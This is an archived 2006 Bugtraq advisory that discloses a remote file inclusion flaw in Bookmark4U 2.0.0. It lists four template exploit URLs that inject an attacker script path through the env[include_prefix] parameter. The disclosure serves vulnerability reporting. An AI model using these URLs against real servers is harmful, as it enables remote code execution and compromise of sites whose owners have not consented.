Bookmark4U Remote File Include

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: Bookmark4U Remote File Include
From: selfar2002@xxxxxxxxxxx
Date: 4 Jun 2006 14:39:27 -0000
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm

---------------------------------------------------------------------------
Bookmark4U <= 2.0.0? ([include_prefix]) Remote File Include Vulnerabilities
---------------------------------------------------------------------------
Discovered By SnIpEr_SA
Author    : SnIpEr_SA
Remote  :  Yes  
Local     :  No  
Critical Level : Dangerous
---------------------------------------------------------------------------

Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Application : Bookmark4U
version     : 2.0.0
URL         :http://bookmark4u.sourceforge.net/
... 
------------------------------------------------------------------ 
Exploit:
~~~~~~~~ 
# 
http://www.site.com/[Bookmark4Upath]/inc/dbase.php?env[include_prefix]=[evil_scripts]
# 
http://www.site.com/[Bookmark4Upath]/inc/config.php?env[include_prefix]=[evil_scripts]
# 
http://www.site.com/[Bookmark4Upath]/inc/common.php?env[include_prefix]=[evil_scripts]
# 
http://www.site.com/[Bookmark4Upath]/inc/function.php?env[include_prefix]=[evil_scripts]

--------------------------------------------------------------------------- 
*/
Contact:
 ~~~~~~~~
 SnIpEr_SA
E-mail: selfar2002@xxxxxxxxxxx
E-mail: SnIpEr.SA[at]hotMail[dot]com
Homepage: http://www.3asfh.net/  & http://www.lezr.com/
Greetz: All My Frind
/* 
-------------------------------- [ END ] ----------------------------------

Follow-Ups:
- Re: Bookmark4U Remote File Include
  - From: str0ke

Prev by Date: Client buffer-overflow in Quake 3 engine (1.32c / rev 795)
Next by Date: # MHG Security Team ---Rumble 1.02 version Remote File Inc.
Previous by thread: Client buffer-overflow in Quake 3 engine (1.32c / rev 795)
Next by thread: Re: Bookmark4U Remote File Include
Index(es):
- Date
- Thread